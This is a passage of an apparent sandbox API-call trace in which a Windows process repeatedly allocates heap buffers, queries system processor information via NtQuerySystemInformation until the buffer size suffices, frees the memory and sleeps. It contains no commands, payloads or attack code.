ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0295.283] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0295.284] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a540 [0295.284] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a540, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a540, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0295.284] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a540 | out: hHeap=0x2560000) returned 1 [0295.284] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c3e8 [0295.284] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c3e8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c3e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0295.285] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c3e8 | out: hHeap=0x2560000) returned 1 [0295.285] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cdb0 [0295.285] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cdb0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cdb0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0295.285] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cdb0 | out: hHeap=0x2560000) returned 1 [0295.285] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0295.286] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0295.286] Sleep (dwMilliseconds=0x110) [0295.297] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d638 [0295.297] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d638, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d638, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0295.298] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d638 | out: hHeap=0x2560000) returned 1 [0295.298] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa88 [0295.298] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa88, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa88, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0295.298] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa88 | out: hHeap=0x2560000) returned 1 [0295.298] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb00 [0295.298] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb00, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb00, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0295.299] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb00 | out: hHeap=0x2560000) returned 1 [0295.299] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ca90 [0295.299] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ca90, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ca90, ResultLength=0x19ee88*=0xc0) returned 0x0 [0295.299] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ca90 | out: hHeap=0x2560000) returned 1 [0295.299] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0295.300] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0295.300] Sleep (dwMilliseconds=0x110) [0295.315] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d718 [0295.315] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d718, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d718, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0295.316] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d718 | out: hHeap=0x2560000) returned 1 [0295.316] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a610 [0295.316] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a610, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a610, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0295.319] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a610 | out: hHeap=0x2560000) returned 1 [0295.319] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c2b8 [0295.319] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c2b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c2b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0295.323] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c2b8 | out: hHeap=0x2560000) returned 1 [0295.323] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cdb0 [0295.323] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cdb0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cdb0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0295.324] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cdb0 | out: hHeap=0x2560000) returned 1 [0295.324] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0295.325] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0295.330] Sleep (dwMilliseconds=0x110) [0295.341] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 [0295.341] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0295.342] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0295.345] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a540 [0295.345] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a540, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a540, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0295.346] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a540 | out: hHeap=0x2560000) returned 1 [0295.346] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c350 [0295.346] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c350, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c350, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0295.346] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c350 | out: hHeap=0x2560000) returned 1 [0295.346] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c900 [0295.346] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c900, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c900, ResultLength=0x19ee88*=0xc0) returned 0x0 [0295.347] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c900 | out: hHeap=0x2560000) returned 1 [0295.347] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0295.347] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0295.347] Sleep (dwMilliseconds=0x110) [0295.359] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0295.359] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0295.360] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0295.360] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0295.360] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0295.360] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0295.360] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c0f0 [0295.360] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c0f0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c0f0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0295.361] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c0f0 | out: hHeap=0x2560000) returned 1 [0295.361] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cc20 [0295.361] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cc20, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cc20, ResultLength=0x19ee88*=0xc0) returned 0x0 [0295.361] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cc20 | out: hHeap=0x2560000) returned 1 [0295.361] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0295.362] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0295.362] Sleep (dwMilliseconds=0x110) [0295.380] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0295.380] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0295.381] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0295.381] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a4d8 [0295.381] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a4d8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a4d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0295.382] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a4d8 | out: hHeap=0x2560000) returned 1 [0295.382] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bdf8 [0295.382] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bdf8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bdf8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0295.382] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bdf8 | out: hHeap=0x2560000) returned 1 [0295.382] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c838 [0295.382] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c838, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c838, ResultLength=0x19ee88*=0xc0) returned 0x0 [0295.383] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c838 | out: hHeap=0x2560000) returned 1 [0295.383] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0295.384] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0295.384] Sleep (dwMilliseconds=0x110) [0295.388] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0295.388] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0295.389] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0295.389] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0295.389] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0295.389] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0295.389] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c350 [0295.389] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c350, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c350, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0295.390] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c350 | out: hHeap=0x2560000) returned 1 [0295.390] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d3f0 [0295.390] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d3f0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d3f0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0295.390] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d3f0 | out: hHeap=0x2560000) returned 1 [0295.390] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0295.391] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0295.391] Sleep (dwMilliseconds=0x110) [0295.424] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d8a0 [0295.424] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d8a0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0295.424] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d8a0 | out: hHeap=0x2560000) returned 1 [0295.424] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a540 [0295.424] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a540, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a540, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0295.425] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a540 | out: hHeap=0x2560000) returned 1 [0295.425] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb00 [0295.425] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb00, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb00, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0295.425] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb00 | out: hHeap=0x2560000) returned 1 [0295.429] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cdb0 [0295.429] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cdb0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cdb0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0295.430] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cdb0 | out: hHeap=0x2560000) returned 1 [0295.430] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0295.430] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0295.430] Sleep (dwMilliseconds=0x110) [0295.439] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d558 [0295.439] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d558, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d558, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0295.440] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d558 | out: hHeap=0x2560000) returned 1 [0295.440] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a9b8 [0295.440] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a9b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a9b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0295.441] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a9b8 | out: hHeap=0x2560000) returned 1 [0295.441] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c188 [0295.441] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c188, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c188, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0295.442] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c188 | out: hHeap=0x2560000) returned 1 [0295.442] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d3f0 [0295.442] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d3f0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d3f0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0295.442] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d3f0 | out: hHeap=0x2560000) returned 1 [0295.442] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0295.443] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0295.443] Sleep (dwMilliseconds=0x110) [0295.454] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0295.455] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0295.455] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0295.455] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a748 [0295.455] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a748, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a748, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0295.456] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a748 | out: hHeap=0x2560000) returned 1 [0295.456] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c058 [0295.456] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c058, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c058, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0295.456] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c058 | out: hHeap=0x2560000) returned 1 [0295.456] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cce8 [0295.456] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cce8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cce8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0295.457] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cce8 | out: hHeap=0x2560000) returned 1 [0295.457] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0295.457] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0295.457] Sleep (dwMilliseconds=0x110) [0295.470] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d590 [0295.470] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d590, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d590, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0295.471] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d590 | out: hHeap=0x2560000) returned 1 [0295.471] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a540 [0295.471] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a540, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a540, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0295.472] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a540 | out: hHeap=0x2560000) returned 1 [0295.472] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b5a8 [0295.472] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b5a8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0295.473] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b5a8 | out: hHeap=0x2560000) returned 1 [0295.473] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cce8 [0295.473] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cce8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cce8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0295.474] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cce8 | out: hHeap=0x2560000) returned 1 [0295.474] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0295.474] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0295.474] Sleep (dwMilliseconds=0x110) [0295.486] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 [0295.486] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0295.487] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0295.487] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a6e0 [0295.487] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a6e0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0295.488] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a6e0 | out: hHeap=0x2560000) returned 1 [0295.488] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bfc0 [0295.488] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bfc0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bfc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0295.489] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bfc0 | out: hHeap=0x2560000) returned 1 [0295.489] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c6a8 [0295.489] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c6a8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c6a8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0295.489] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c6a8 | out: hHeap=0x2560000) returned 1 [0295.489] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0295.490] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0295.490] Sleep (dwMilliseconds=0x110) [0295.514] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 [0295.514] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0295.516] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0295.516] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a4d8 [0295.516] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a4d8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a4d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0295.517] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a4d8 | out: hHeap=0x2560000) returned 1 [0295.517] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bdf8 [0295.517] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bdf8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bdf8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0295.518] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bdf8 | out: hHeap=0x2560000) returned 1 [0295.518] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c6a8 [0295.518] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c6a8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c6a8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0295.519] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c6a8 | out: hHeap=0x2560000) returned 1 [0295.519] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0295.520] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0295.525] Sleep (dwMilliseconds=0x110) [0295.554] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0295.554] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0295.554] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0295.554] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a678 [0295.554] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a678, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a678, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0295.555] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a678 | out: hHeap=0x2560000) returned 1 [0295.555] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb98 [0295.555] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb98, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb98, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0295.555] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb98 | out: hHeap=0x2560000) returned 1 [0295.555] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cdb0 [0295.555] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cdb0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cdb0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0295.556] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cdb0 | out: hHeap=0x2560000) returned 1 [0295.556] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0295.556] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0295.556] Sleep (dwMilliseconds=0x110) [0295.559] RtlAllocateHeap (HeapHandle=0x2560000, 